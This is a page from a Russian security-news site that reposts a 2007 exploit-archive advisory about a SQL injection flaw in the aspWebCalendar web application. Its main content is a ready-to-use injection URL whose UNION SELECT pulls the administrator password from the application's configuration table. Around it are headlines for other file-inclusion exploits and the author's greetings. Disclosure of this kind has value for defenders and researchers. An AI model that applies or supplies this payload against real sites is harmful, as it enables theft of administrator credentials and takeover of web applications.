Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  Image_Upload Script  Remote File Inclusion Exploit Free Image Hosting 2.0

  Net Side Content Management System

  LMS <= 1.8.9 Vala Remote File Inclusion Vulnerabilities

  ttCMS <= v4 (ez_sql.php lib_path) Remote File Inclusion Vulnerability

From:parad0x_(at)_bsdmail.com <parad0x_(at)_bsdmail.com>
Date:25 марта 2007 г.
Subject:aspWebCalendar Remote SQL Injection Vulnerability

*******************************************************************************
# Title   :  aspWebCalendar Remote SQL Injection Vulnerability
# Author  :  parad0x
# Contact :  :(
# D.Page  :  http://www.scriptdungeon.com/script.php?ScriptID=4306
# $$      :  free
#S.Page : http://fullrevolution.com
*******************************************************************************
http://[target]/[path]/calendar.asp?action=viewevent&eventid=[SQL]

Example:

/calendar.asp?action=viewevent&eventid=-1%20union%20select%200,
Cal_ConfigId,Cal_ConfigAdminPassword,3,4,5,6,7,8,9%20from%20Cal_config

""""""""""""""
"""""""
greetz : VoLqaN, x-MastER,Ekin0x,xoron

""""""""""""""
"""""""
www.p4r4d0x.com

# milw0rm.com [2007-03-22]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород